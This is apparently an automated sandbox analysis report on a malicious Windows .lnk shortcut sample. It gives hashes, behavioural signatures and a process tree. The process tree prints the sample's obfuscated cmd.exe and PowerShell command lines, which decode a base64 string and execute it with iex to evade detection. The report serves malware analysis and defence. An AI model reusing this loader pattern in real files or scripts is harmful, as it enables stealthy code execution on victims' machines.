Analysis
max time kernel: 122s
max time network: 129s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 13-11-2024 21:38
Static task: static1
Behavioral task: behavioral1
  Sample: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
  Resource: win10v2004-20241007-en
General
Target: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Size: 2KB
MD5: e567fd6bd2ad541ea7cff36788a1cb04
SHA1: 335983d1da7118026ec9cb6befd1cbd3a84edf9b
SHA256: ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b
SHA512: fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c
Malware Config
Signatures
- An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  Processes:
    pid   Process
    2424  cmd.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses 1 IoCs
  Processes:
    pid   Process
    2532  powershell.exe
- Suspicious use of AdjustPrivilegeToken 1 IoCs
  Processes:
    description              pid   Process
    Token: SeDebugPrivilege  2532  powershell.exe
- Suspicious use of WriteProcessMemory 6 IoCs
  Processes:
    description                        pid   Process  procid_target
    PID 2368 wrote to memory of 2424   2368  cmd.exe  31
    PID 2368 wrote to memory of 2424   2368  cmd.exe  31
    PID 2368 wrote to memory of 2424   2368  cmd.exe  31
    PID 2424 wrote to memory of 2532   2424  cmd.exe  32
    PID 2424 wrote to memory of 2532   2424  cmd.exe  32
    PID 2424 wrote to memory of 2532   2424  cmd.exe  32
Processes
- C:\Windows\system32\cmd.exe (level 1)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
  - Suspicious use of WriteProcessMemory
  PID: 2368
  - C:\Windows\system32\cmd.exe (level 2)
    Command line: "C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='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';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory
    PID: 2424
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: powershell.exe -c "&{$xW='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';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2532